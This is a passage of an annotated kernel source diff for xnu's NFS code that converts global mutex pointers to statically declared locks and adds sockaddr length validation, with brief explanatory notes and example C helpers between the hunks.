                TAILQ_FOREACH(nmp, &nfs4_cb_mounts, nm_cblink) {
                        if (nmp->nm_cbid != cbid) {
                                continue;
@@ -2941,7 +2957,7 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq)
                if (nmp) {
                        nmp->nm_cbrefs++;
                }
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                if (!nmp) {
                        /* if no mount match, just drop socket. */
                        error = EPERM;
@@ -3087,12 +3103,12 @@ nfs4_cb_handler(struct nfs_callback_socket *ncbsp, mbuf_t mreq)
                nfsm_chain_null(&nmrep);
 
                /* drop the callback reference on the mount */
-               lck_mtx_lock(nfs_global_mutex);
+               lck_mtx_lock(&nfs_global_mutex);
                nmp->nm_cbrefs--;
                if (!nmp->nm_cbid) {
                        wakeup(&nmp->nm_cbrefs);
                }
-               lck_mtx_unlock(nfs_global_mutex);
+               lck_mtx_unlock(&nfs_global_mutex);
                break;
        }
 
@@ -3857,7 +3873,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep)
         * Loop through the request list to match up the reply
         * Iff no match, just drop it.
         */
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        TAILQ_FOREACH(req, &nfs_reqq, r_chain) {
                if (req->r_nmrep.nmc_mhead || (rxid != R_XID32(req->r_xid))) {
                        continue;
@@ -3933,7 +3949,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep)
                }
 #endif /* CONFIG_NFS_GSS */
                lck_mtx_unlock(&req->r_mtx);
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
                /* if it's an async RPC with a callback, queue it up */
                if (asyncioq) {
                        nfs_asyncio_finish(req);
@@ -3943,7 +3959,7 @@ nfs_request_match_reply(struct nfsmount *nmp, mbuf_t mrep)
 
        if (!req) {
                /* not matched to a request, so drop it. */
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
                OSAddAtomic64(1, &nfsstats.rpcunexpected);
                mbuf_freem(mrep);
        }
@@ -4089,7 +4105,7 @@ nfs_request_create(
                panic("nfs_request: invalid NFSv4 RPC request %d\n", procnum);
        }
 
-       lck_mtx_init(&req->r_mtx, nfs_request_grp, LCK_ATTR_NULL);
+       lck_mtx_init(&req->r_mtx, &nfs_request_grp, LCK_ATTR_NULL);
        req->r_nmp = nmp;
        nmp->nm_ref++;
        req->r_np = np;
@@ -4161,12 +4177,12 @@ nfs_request_destroy(struct nfsreq *req)
                 * Still on an async I/O queue?
                 * %%% But which one, we may be on a local iod.
                 */
-               lck_mtx_lock(nfsiod_mutex);
+               lck_mtx_lock(&nfsiod_mutex);
                if (nmp && req->r_achain.tqe_next != NFSREQNOLIST) {
                        TAILQ_REMOVE(&nmp->nm_iodq, req, r_achain);
                        req->r_achain.tqe_next = NFSREQNOLIST;
                }
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
        }
 
        lck_mtx_lock(&req->r_mtx);
@@ -4233,7 +4249,7 @@ nfs_request_destroy(struct nfsreq *req)
        if (nmp) {
                nfs_mount_rele(nmp);
        }
-       lck_mtx_destroy(&req->r_mtx, nfs_request_grp);
+       lck_mtx_destroy(&req->r_mtx, &nfs_request_grp);
        if (req->r_flags & R_ALLOCATED) {
                NFS_ZFREE(nfs_req_zone, req);
        }
@@ -4330,11 +4346,11 @@ nfs_request_send(struct nfsreq *req, int wait)
        req->r_flags |= R_SENDING;
        lck_mtx_unlock(&req->r_mtx);
 
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
 
        nmp = req->r_nmp;
        if (nfs_mount_gone(nmp)) {
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
                return ENXIO;
        }
 
@@ -4372,7 +4388,7 @@ nfs_request_send(struct nfsreq *req, int wait)
                nfs_interval_timer_start(nfs_request_timer_call,
                    NFS_REQUESTDELAY);
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 
        /* Send the request... */
        return nfs_send(req, wait);
@@ -5191,16 +5207,16 @@ nfs_softterm(struct nfsreq *req)
 void
 nfs_reqdequeue(struct nfsreq *req)
 {
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        while (req->r_lflags & RL_BUSY) {
                req->r_lflags |= RL_WAITING;
-               msleep(&req->r_lflags, nfs_request_mutex, PSOCK, "reqdeq", NULL);
+               msleep(&req->r_lflags, &nfs_request_mutex, PSOCK, "reqdeq", NULL);
        }
        if (req->r_lflags & RL_QUEUED) {
                TAILQ_REMOVE(&nfs_reqq, req, r_chain);
                req->r_lflags &= ~RL_QUEUED;
        }
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 }
 
 /*
@@ -5265,11 +5281,11 @@ nfs_request_timer(__unused void *param0, __unused void *param1)
        TAILQ_INIT(&nfs_mount_poke_queue);
 
 restart:
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        req = TAILQ_FIRST(&nfs_reqq);
        if (req == NULL) {      /* no requests - turn timer off */
                nfs_request_timer_on = 0;
-               lck_mtx_unlock(nfs_request_mutex);
+               lck_mtx_unlock(&nfs_request_mutex);
                return;
        }
 
@@ -5399,7 +5415,7 @@ restart:
                                        TAILQ_REMOVE(&nfs_mount_poke_queue, nmp, nm_pokeq);
                                }
                                /* Release our lock state, so we can become a zombie */
-                               lck_mtx_unlock(nfs_request_mutex);
+                               lck_mtx_unlock(&nfs_request_mutex);
 
                                /*
                                 * Note nfs_mount_make zombie(nmp) must be
@@ -5407,7 +5423,7 @@ restart:
                                 * work we release nm_lock in
                                 * nfs_make_mount_zombie with out acquiring any
                                 * other locks. (Later, in nfs_mount_zombie we
-                                * will acquire nfs_request_mutex, r_mtx,
+                                * will acquire &nfs_request_mutex, r_mtx,
                                 * nm_lock in that order). So we should not be
                                 * introducing deadlock here. We take a reference
                                 * on the mount so that its still there when we
@@ -5508,7 +5524,7 @@ restart:
                lck_mtx_unlock(&req->r_mtx);
        }
 
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 
        /* poke any sockets */
        while ((nmp = TAILQ_FIRST(&nfs_mount_poke_queue))) {
@@ -5535,6 +5551,7 @@ nfs_noremotehang(thread_t thd)
  * This is used to determine if we need to bail on a mount.
  * ETIMEDOUT is returned if there has been a soft timeout.
  * EINTR is returned if there is a signal pending that is not being ignored
  * and the mount is interruptable, or if we are a thread that is in the process
  * of cancellation (also SIGKILL posted).
+ * ESHUTDOWN is returned if the system is in shutdown.
  */
@@ -5549,6 +5566,11 @@ nfs_sigintr(struct nfsmount *nmp, struct nfsreq *req, thread_t thd, int nmplocke
                return ENXIO;
        }
 
+       if (get_system_inshutdown()) {
+               NFS_SOCK_DBG("Shutdown in progress\n");
+               return ESHUTDOWN;
+       }
+
        if (req && (req->r_flags & R_SOFTTERM)) {
                return ETIMEDOUT; /* request has been terminated. */
        }
@@ -6685,9 +6707,9 @@ dorecs:
                int wake = (slp->ns_flag & SLP_WORKTODO);
                lck_rw_done(&slp->ns_rwlock);
                if (wake && nfsd_thread_count) {
-                       lck_mtx_lock(nfsd_mutex);
+                       lck_mtx_lock(&nfsd_mutex);
                        nfsrv_wakenfsd(slp);
-                       lck_mtx_unlock(nfsd_mutex);
+                       lck_mtx_unlock(&nfsd_mutex);
                }
        }
 }
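
Besides the global-mutex conversion, nfs_socket_create() stops trusting the caller's sockaddr: each address family is now checked against the expected sa_len before the structure is cast, and AF_LOCAL also accepts an address trimmed to SUN_LEN() of its path, with a local fallback definition of that macro. A standalone sketch of the same validation idiom (illustrative, not the xnu routine itself):

#include <string.h>
#include <errno.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <netinet/in.h>

#ifndef SUN_LEN
#define SUN_LEN(su) \
        (sizeof(*(su)) - sizeof((su)->sun_path) + strnlen((su)->sun_path, sizeof((su)->sun_path)))
#endif

/* Returns 0 if sa is plausibly sized for its family, EINVAL otherwise. */
static int
sockaddr_len_ok(const struct sockaddr *sa)
{
        switch (sa->sa_family) {
        case AF_INET:
                return sa->sa_len == sizeof(struct sockaddr_in) ? 0 : EINVAL;
        case AF_INET6:
                return sa->sa_len == sizeof(struct sockaddr_in6) ? 0 : EINVAL;
        case AF_LOCAL:
                if (sa->sa_len == sizeof(struct sockaddr_un) ||
                    sa->sa_len == SUN_LEN((const struct sockaddr_un *)sa)) {
                        return 0;
                }
                return EINVAL;
        default:
                return EINVAL;  /* unknown family: reject rather than guess */
        }
}

Rejecting short sa_len values up front means the later casts to sockaddr_in, sockaddr_in6 and sockaddr_un can no longer read past the end of the buffer the caller supplied.
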
index 5addbf6fbac7175270d355dcf1d7d9f82ca26045..a934d4d078082bd83d1f8efd2c03896b4fcfe100 100644 (file)
@@ -100,8 +100,8 @@ LIST_HEAD(nfsrv_reqcache_hash, nfsrvcache) * nfsrv_reqcache_hashtbl;
 TAILQ_HEAD(nfsrv_reqcache_lru, nfsrvcache) nfsrv_reqcache_lruhead;
 u_long nfsrv_reqcache_hash;
 
-lck_grp_t *nfsrv_reqcache_lck_grp;
-lck_mtx_t *nfsrv_reqcache_mutex;
+static LCK_GRP_DECLARE(nfsrv_reqcache_lck_grp, "nfsrv_reqcache");
+LCK_MTX_DECLARE(nfsrv_reqcache_mutex, &nfsrv_reqcache_lck_grp);
 
 /*
  * Static array that defines which nfs rpc's are nonidempotent
@@ -164,11 +164,11 @@ nfsrv_initcache(void)
                return;
        }
 
-       lck_mtx_lock(nfsrv_reqcache_mutex);
+       lck_mtx_lock(&nfsrv_reqcache_mutex);
        /* init nfs server request cache hash table */
        nfsrv_reqcache_hashtbl = hashinit(nfsrv_reqcache_size, M_NFSD, &nfsrv_reqcache_hash);
        TAILQ_INIT(&nfsrv_reqcache_lruhead);
-       lck_mtx_unlock(nfsrv_reqcache_mutex);
+       lck_mtx_unlock(&nfsrv_reqcache_mutex);
 }
 
 /*
@@ -239,7 +239,7 @@ nfsrv_getcache(
        if (!nd->nd_nam2) {
                return RC_DOIT;
        }
-       lck_mtx_lock(nfsrv_reqcache_mutex);
+       lck_mtx_lock(&nfsrv_reqcache_mutex);
 loop:
        for (rp = NFSRCHASH(nd->nd_retxid)->lh_first; rp != 0;
            rp = rp->rc_hash.le_next) {
@@ -247,7 +247,7 @@ loop:
                    netaddr_match(rp->rc_family, &rp->rc_haddr, nd->nd_nam)) {
                        if ((rp->rc_flag & RC_LOCKED) != 0) {
                                rp->rc_flag |= RC_WANTED;
-                               msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
+                               msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
                                goto loop;
                        }
                        rp->rc_flag |= RC_LOCKED;
@@ -293,7 +293,7 @@ loop:
                                rp->rc_flag &= ~RC_WANTED;
                                wakeup(rp);
                        }
-                       lck_mtx_unlock(nfsrv_reqcache_mutex);
+                       lck_mtx_unlock(&nfsrv_reqcache_mutex);
                        return ret;
                }
        }
@@ -315,12 +315,12 @@ loop:
                if (!rp) {
                        /* no entry to reuse? */
                        /* OK, we just won't be able to cache this request */
-                       lck_mtx_unlock(nfsrv_reqcache_mutex);
+                       lck_mtx_unlock(&nfsrv_reqcache_mutex);
                        return RC_DOIT;
                }
                while ((rp->rc_flag & RC_LOCKED) != 0) {
                        rp->rc_flag |= RC_WANTED;
-                       msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
+                       msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
                        rp = nfsrv_reqcache_lruhead.tqh_first;
                }
                rp->rc_flag |= RC_LOCKED;
@@ -365,7 +365,7 @@ loop:
                rp->rc_flag &= ~RC_WANTED;
                wakeup(rp);
        }
-       lck_mtx_unlock(nfsrv_reqcache_mutex);
+       lck_mtx_unlock(&nfsrv_reqcache_mutex);
        return RC_DOIT;
 }
 
@@ -384,7 +384,7 @@ nfsrv_updatecache(
        if (!nd->nd_nam2) {
                return;
        }
-       lck_mtx_lock(nfsrv_reqcache_mutex);
+       lck_mtx_lock(&nfsrv_reqcache_mutex);
 loop:
        for (rp = NFSRCHASH(nd->nd_retxid)->lh_first; rp != 0;
            rp = rp->rc_hash.le_next) {
@@ -392,7 +392,7 @@ loop:
                    netaddr_match(rp->rc_family, &rp->rc_haddr, nd->nd_nam)) {
                        if ((rp->rc_flag & RC_LOCKED) != 0) {
                                rp->rc_flag |= RC_WANTED;
-                               msleep(rp, nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
+                               msleep(rp, &nfsrv_reqcache_mutex, PZERO - 1, "nfsrc", NULL);
                                goto loop;
                        }
                        rp->rc_flag |= RC_LOCKED;
@@ -430,11 +430,11 @@ loop:
                                rp->rc_flag &= ~RC_WANTED;
                                wakeup(rp);
                        }
-                       lck_mtx_unlock(nfsrv_reqcache_mutex);
+                       lck_mtx_unlock(&nfsrv_reqcache_mutex);
                        return;
                }
        }
-       lck_mtx_unlock(nfsrv_reqcache_mutex);
+       lck_mtx_unlock(&nfsrv_reqcache_mutex);
 }
 
 /*
@@ -445,7 +445,7 @@ nfsrv_cleancache(void)
 {
        struct nfsrvcache *rp, *nextrp;
 
-       lck_mtx_lock(nfsrv_reqcache_mutex);
+       lck_mtx_lock(&nfsrv_reqcache_mutex);
        for (rp = nfsrv_reqcache_lruhead.tqh_first; rp != 0; rp = nextrp) {
                nextrp = rp->rc_lru.tqe_next;
                LIST_REMOVE(rp, rc_hash);
@@ -454,7 +454,7 @@ nfsrv_cleancache(void)
        }
        nfsrv_reqcache_count = 0;
        FREE(nfsrv_reqcache_hashtbl, M_TEMP);
-       lck_mtx_unlock(nfsrv_reqcache_mutex);
+       lck_mtx_unlock(&nfsrv_reqcache_mutex);
 }
 
 #endif /* CONFIG_NFS_SERVER */
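
Most of the request-cache hunks, like the node-hash hunks earlier, only change msleep()'s mutex argument to &nfsrv_reqcache_mutex; the surrounding RC_LOCKED/RC_WANTED hand-off protocol is untouched. For reference, a minimal sketch of that sleep/wakeup idiom under a single statically declared mutex (flag and field names here are placeholders):

#include <sys/types.h>
#include <sys/param.h>
#include <sys/systm.h>
#include <kern/locks.h>

#define ENTRY_LOCKED    0x01
#define ENTRY_WANTED    0x02

struct entry {
        uint32_t        e_flags;
};

static LCK_GRP_DECLARE(table_grp, "table");
static LCK_MTX_DECLARE(table_mtx, &table_grp);

static void
entry_lock(struct entry *ep)
{
        lck_mtx_lock(&table_mtx);
        while (ep->e_flags & ENTRY_LOCKED) {
                ep->e_flags |= ENTRY_WANTED;
                /* msleep drops table_mtx for the sleep and retakes it before returning */
                msleep(ep, &table_mtx, PZERO - 1, "entrylk", NULL);
        }
        ep->e_flags |= ENTRY_LOCKED;
        lck_mtx_unlock(&table_mtx);
}

static void
entry_unlock(struct entry *ep)
{
        lck_mtx_lock(&table_mtx);
        ep->e_flags &= ~ENTRY_LOCKED;
        if (ep->e_flags & ENTRY_WANTED) {
                ep->e_flags &= ~ENTRY_WANTED;
                wakeup(ep);     /* wake every thread blocked in msleep(ep, ...) */
        }
        lck_mtx_unlock(&table_mtx);
}
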
index b4be3353fcea1f4cdc7cdcddb609f55ceb502d7f..a58fc7869ea8f271cc002ad6a8a6a42b3a2fbfa6 100644 (file)
@@ -1040,7 +1040,7 @@ nfs_get_xid(uint64_t *xidp)
 {
        struct timeval tv;
 
-       lck_mtx_lock(nfs_request_mutex);
+       lck_mtx_lock(&nfs_request_mutex);
        if (!nfs_xid) {
                /*
                 * Derive initial xid from system time.
@@ -1059,7 +1059,7 @@ nfs_get_xid(uint64_t *xidp)
                nfs_xid++;
        }
        *xidp = nfs_xid + (nfs_xidwrap << 32);
-       lck_mtx_unlock(nfs_request_mutex);
+       lck_mtx_unlock(&nfs_request_mutex);
 }
 
 /*
@@ -2755,13 +2755,14 @@ nfsrv_hang_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
        struct radix_node *rn;
        struct sockaddr *saddr, *smask;
        struct domain *dom;
-       size_t i;
+       size_t i, ss_minsize;
        int error;
        unsigned int net;
        user_addr_t uaddr;
        kauth_cred_t cred;
 
        uaddr = unxa->nxa_nets;
+       ss_minsize = sizeof(((struct sockaddr_storage *)0)->ss_len) + sizeof(((struct sockaddr_storage *)0)->ss_family);
        for (net = 0; net < unxa->nxa_netcount; net++, uaddr += sizeof(nxna)) {
                error = copyin(uaddr, &nxna, sizeof(nxna));
                if (error) {
@@ -2769,7 +2770,9 @@ nfsrv_hang_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
                }
 
                if (nxna.nxna_addr.ss_len > sizeof(struct sockaddr_storage) ||
+                   (nxna.nxna_addr.ss_len != 0 && nxna.nxna_addr.ss_len < ss_minsize) ||
                    nxna.nxna_mask.ss_len > sizeof(struct sockaddr_storage) ||
+                   (nxna.nxna_mask.ss_len != 0 && nxna.nxna_mask.ss_len < ss_minsize) ||
                    nxna.nxna_addr.ss_family > AF_MAX ||
                    nxna.nxna_mask.ss_family > AF_MAX) {
                        return EINVAL;
@@ -2956,6 +2959,7 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
        struct radix_node *rn;
        struct nfsrv_free_netopt_arg fna;
        struct nfs_netopt *nno;
+       size_t ss_minsize;
        user_addr_t uaddr;
        unsigned int net;
        int i, error;
@@ -2976,6 +2980,7 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
 
        /* delete only the exports specified */
        uaddr = unxa->nxa_nets;
+       ss_minsize = sizeof(((struct sockaddr_storage *)0)->ss_len) + sizeof(((struct sockaddr_storage *)0)->ss_family);
        for (net = 0; net < unxa->nxa_netcount; net++, uaddr += sizeof(nxna)) {
                error = copyin(uaddr, &nxna, sizeof(nxna));
                if (error) {
@@ -2994,6 +2999,20 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
                        continue;
                }
 
+               if (nxna.nxna_addr.ss_len > sizeof(struct sockaddr_storage) ||
+                   (nxna.nxna_addr.ss_len != 0 && nxna.nxna_addr.ss_len < ss_minsize) ||
+                   nxna.nxna_addr.ss_family > AF_MAX) {
+                       printf("nfsrv_free_addrlist: invalid socket address (%u)\n", net);
+                       continue;
+               }
+
+               if (nxna.nxna_mask.ss_len > sizeof(struct sockaddr_storage) ||
+                   (nxna.nxna_mask.ss_len != 0 && nxna.nxna_mask.ss_len < ss_minsize) ||
+                   nxna.nxna_mask.ss_family > AF_MAX) {
+                       printf("nfsrv_free_addrlist: invalid socket mask (%u)\n", net);
+                       continue;
+               }
+
                if ((rnh = nx->nx_rtable[nxna.nxna_addr.ss_family]) == 0) {
                        /* AF not initialized? */
                        if (!(unxa->nxa_flags & NXA_ADD)) {
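The ss_len checks added above reject sockaddr_storage records copied in from user space whose length exceeds the structure or, when non-zero, is smaller than the ss_len/ss_family header. A hedged, self-contained sketch of the same bounds check; the helper name is hypothetical and only illustrates the rule applied in both nfsrv_hang_addrlist() and nfsrv_free_addrlist():

#include <stdbool.h>
#include <sys/socket.h>

/* Hypothetical helper mirroring the validation above: an address record must be
 * empty (ss_len == 0) or large enough to hold ss_len and ss_family, must not
 * exceed the storage size, and must carry a sane address family. */
static bool
sockaddr_storage_sane(const struct sockaddr_storage *ss)
{
	const size_t ss_minsize = sizeof(ss->ss_len) + sizeof(ss->ss_family);

	if (ss->ss_len > sizeof(struct sockaddr_storage)) {
		return false;
	}
	if (ss->ss_len != 0 && ss->ss_len < ss_minsize) {
		return false;
	}
	return ss->ss_family <= AF_MAX;
}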
@@ -3031,21 +3050,24 @@ nfsrv_free_addrlist(struct nfs_export *nx, struct user_nfs_export_args *unxa)
 
 void enablequotas(struct mount *mp, vfs_context_t ctx); // XXX
 
+#define DATA_VOLUME_MP "/System/Volumes/Data" // PLATFORM_DATA_VOLUME_MOUNT_POINT
+
 int
 nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx)
 {
        int error = 0;
-       size_t pathlen;
+       size_t pathlen, nxfs_pathlen;
        struct nfs_exportfs *nxfs, *nxfs2, *nxfs3;
        struct nfs_export *nx, *nx2, *nx3;
        struct nfs_filehandle nfh;
        struct nameidata mnd, xnd;
        vnode_t mvp = NULL, xvp = NULL;
        mount_t mp = NULL;
-       char path[MAXPATHLEN];
+       char path[MAXPATHLEN], *nxfs_path;
        char fl_pathbuff[MAXPATHLEN];
        int fl_pathbuff_len = MAXPATHLEN;
        int expisroot;
+       size_t datavol_len = strlen(DATA_VOLUME_MP);
 
        if (unxa->nxa_flags == NXA_CHECK) {
                /* just check if the path is an NFS-exportable file system */
@@ -3147,7 +3169,8 @@ nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx)
        }
        if (nxfs) {
                /* verify exported FS path matches given path */
-               if (strncmp(path, nxfs->nxfs_path, MAXPATHLEN)) {
+               if (strncmp(path, nxfs->nxfs_path, MAXPATHLEN) &&
+                   (strncmp(path, DATA_VOLUME_MP, datavol_len) || strncmp(path + datavol_len, nxfs->nxfs_path, MAXPATHLEN - datavol_len))) {
                        error = EEXIST;
                        goto unlock_out;
                }
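The relaxed comparison above lets an export request match an existing nfs_exportfs entry either verbatim or with the "/System/Volumes/Data" firmlink prefix stripped. A small sketch of that two-step strncmp logic, with a hypothetical helper name; it assumes MAXPATHLEN-bounded, NUL-terminated paths:

#include <string.h>
#include <sys/param.h>   /* MAXPATHLEN */

#define DATA_VOLUME_MP "/System/Volumes/Data"

/* Returns 0 when 'path' names the same exported file system as 'exported',
 * either directly or after removing the data-volume mount-point prefix. */
static int
export_path_matches(const char *path, const char *exported)
{
	size_t datavol_len = strlen(DATA_VOLUME_MP);

	if (strncmp(path, exported, MAXPATHLEN) == 0) {
		return 0;
	}
	if (strncmp(path, DATA_VOLUME_MP, datavol_len) == 0 &&
	    strncmp(path + datavol_len, exported, MAXPATHLEN - datavol_len) == 0) {
		return 0;
	}
	return 1;
}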
@@ -3239,13 +3262,20 @@ nfsrv_export(struct user_nfs_export_args *unxa, vfs_context_t ctx)
                }
                bzero(nxfs, sizeof(struct nfs_exportfs));
                nxfs->nxfs_id = unxa->nxa_fsid;
-               MALLOC(nxfs->nxfs_path, char*, pathlen, M_TEMP, M_WAITOK);
+               if (mp) {
+                       nxfs_path = mp->mnt_vfsstat.f_mntonname;
+                       nxfs_pathlen = sizeof(mp->mnt_vfsstat.f_mntonname);
+               } else {
+                       nxfs_path = path;
+                       nxfs_pathlen = pathlen;
+               }
+               MALLOC(nxfs->nxfs_path, char*, nxfs_pathlen, M_TEMP, M_WAITOK);
                if (!nxfs->nxfs_path) {
                        FREE(nxfs, M_TEMP);
                        error = ENOMEM;
                        goto out;
                }
-               bcopy(path, nxfs->nxfs_path, pathlen);
+               bcopy(nxfs_path, nxfs->nxfs_path, nxfs_pathlen);
                /* insert into list in reverse-sorted order */
                nxfs3 = NULL;
                LIST_FOREACH(nxfs2, &nfsrv_exports, nxfs_next) {
@@ -4052,7 +4082,7 @@ nfsrv_init_user_list(struct nfs_active_user_list *ulist)
        }
        ulist->node_count = 0;
 
-       lck_mtx_init(&ulist->user_mutex, nfsrv_active_user_mutex_group, LCK_ATTR_NULL);
+       lck_mtx_init(&ulist->user_mutex, &nfsrv_active_user_mutex_group, LCK_ATTR_NULL);
 }
 
 /* Free all nodes in an active user list */
@@ -4076,7 +4106,7 @@ nfsrv_free_user_list(struct nfs_active_user_list *ulist)
        }
        ulist->node_count = 0;
 
-       lck_mtx_destroy(&ulist->user_mutex, nfsrv_active_user_mutex_group);
+       lck_mtx_destroy(&ulist->user_mutex, &nfsrv_active_user_mutex_group);
 }
 
 /* Reclaim old expired user nodes from active user lists. */
index 90cba6ed4f91cd6dea8d4b96732bd7c3ca8a36f2..511bc3c6b6df63b29dfb1fe192cd2c3b8c88e538 100644 (file)
@@ -358,7 +358,7 @@ void
 nfsiod_terminate(struct nfsiod *niod)
 {
        nfsiod_thread_count--;
-       lck_mtx_unlock(nfsiod_mutex);
+       lck_mtx_unlock(&nfsiod_mutex);
        if (niod) {
                FREE(niod, M_TEMP);
        } else {
@@ -377,21 +377,21 @@ nfsiod_thread(void)
 
        MALLOC(niod, struct nfsiod *, sizeof(struct nfsiod), M_TEMP, M_WAITOK);
        if (!niod) {
-               lck_mtx_lock(nfsiod_mutex);
+               lck_mtx_lock(&nfsiod_mutex);
                nfsiod_thread_count--;
                wakeup(current_thread());
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
                thread_terminate(current_thread());
                /*NOTREACHED*/
        }
        bzero(niod, sizeof(*niod));
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        TAILQ_INSERT_HEAD(&nfsiodfree, niod, niod_link);
        wakeup(current_thread());
-       error = msleep0(niod, nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue);
+       error = msleep0(niod, &nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue);
        /* shouldn't return... so we have an error */
        /* remove an old nfsiod struct and terminate */
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        if ((niod = TAILQ_LAST(&nfsiodfree, nfsiodlist))) {
                TAILQ_REMOVE(&nfsiodfree, niod, niod_link);
        }
@@ -408,18 +408,18 @@ nfsiod_start(void)
 {
        thread_t thd = THREAD_NULL;
 
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        if ((nfsiod_thread_count >= NFSIOD_MAX) && (nfsiod_thread_count > 0)) {
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
                return EBUSY;
        }
        nfsiod_thread_count++;
        if (kernel_thread_start((thread_continue_t)nfsiod_thread, NULL, &thd) != KERN_SUCCESS) {
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
                return EBUSY;
        }
        /* wait for the thread to complete startup */
-       msleep(thd, nfsiod_mutex, PWAIT | PDROP, "nfsiodw", NULL);
+       msleep(thd, &nfsiod_mutex, PWAIT | PDROP, "nfsiodw", NULL);
        thread_deallocate(thd);
        return 0;
 }
@@ -438,7 +438,7 @@ nfsiod_continue(int error)
        struct nfs_reqqhead iodq;
        int morework;
 
-       lck_mtx_lock(nfsiod_mutex);
+       lck_mtx_lock(&nfsiod_mutex);
        niod = TAILQ_FIRST(&nfsiodwork);
        if (!niod) {
                /* there's no work queued up */
@@ -478,7 +478,7 @@ worktodo:
                        req->r_flags |= R_IOD;
                        lck_mtx_unlock(&req->r_mtx);
                }
-               lck_mtx_unlock(nfsiod_mutex);
+               lck_mtx_unlock(&nfsiod_mutex);
 
                /* process the queue */
                TAILQ_FOREACH_SAFE(req, &iodq, r_achain, treq) {
@@ -488,7 +488,7 @@ worktodo:
                }
 
                /* now check if there's more/other work to be done */
-               lck_mtx_lock(nfsiod_mutex);
+               lck_mtx_lock(&nfsiod_mutex);
                morework = !TAILQ_EMPTY(&nmp->nm_iodq);
                if (!morework || !TAILQ_EMPTY(&nfsiodmounts)) {
                        /*
@@ -516,10 +516,10 @@ worktodo:
        /* queue ourselves back up - if there aren't too many threads running */
        if (nfsiod_thread_count <= NFSIOD_MAX) {
                TAILQ_INSERT_HEAD(&nfsiodfree, niod, niod_link);
-               error = msleep0(niod, nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue);
+               error = msleep0(niod, &nfsiod_mutex, PWAIT | PDROP, "nfsiod", NFS_ASYNCTHREADMAXIDLE * hz, nfsiod_continue);
                /* shouldn't return... so we have an error */
                /* remove an old nfsiod struct and terminate */
-               lck_mtx_lock(nfsiod_mutex);
+               lck_mtx_lock(&nfsiod_mutex);
                if ((niod = TAILQ_LAST(&nfsiodfree, nfsiodlist))) {
                        TAILQ_REMOVE(&nfsiodfree, niod, niod_link);
                }
@@ -1028,16 +1028,16 @@ nfssvc_addsock(socket_t so, mbuf_t mynam)
                return ENOMEM;
        }
        bzero((caddr_t)slp, sizeof(struct nfsrv_sock));
-       lck_rw_init(&slp->ns_rwlock, nfsrv_slp_rwlock_group, LCK_ATTR_NULL);
-       lck_mtx_init(&slp->ns_wgmutex, nfsrv_slp_mutex_group, LCK_ATTR_NULL);
+       lck_rw_init(&slp->ns_rwlock, &nfsrv_slp_rwlock_group, LCK_ATTR_NULL);
+       lck_mtx_init(&slp->ns_wgmutex, &nfsrv_slp_mutex_group, LCK_ATTR_NULL);
 
-       lck_mtx_lock(nfsd_mutex);
+       lck_mtx_lock(&nfsd_mutex);
 
        if (soprotocol == IPPROTO_UDP) {
                if (sodomain == AF_INET) {
                        /* There should be only one UDP/IPv4 socket */
                        if (nfsrv_udpsock) {
-                               lck_mtx_unlock(nfsd_mutex);
+                               lck_mtx_unlock(&nfsd_mutex);
                                nfsrv_slpfree(slp);
                                mbuf_freem(mynam);
                                return EEXIST;
@@ -1047,7 +1047,7 @@ nfssvc_addsock(socket_t so, mbuf_t mynam)
                if (sodomain == AF_INET6) {
                        /* There should be only one UDP/IPv6 socket */
                        if (nfsrv_udp6sock) {
-                               lck_mtx_unlock(nfsd_mutex);
+                               lck_mtx_unlock(&nfsd_mutex);
                                nfsrv_slpfree(slp);
                                mbuf_freem(mynam);
                                return EEXIST;
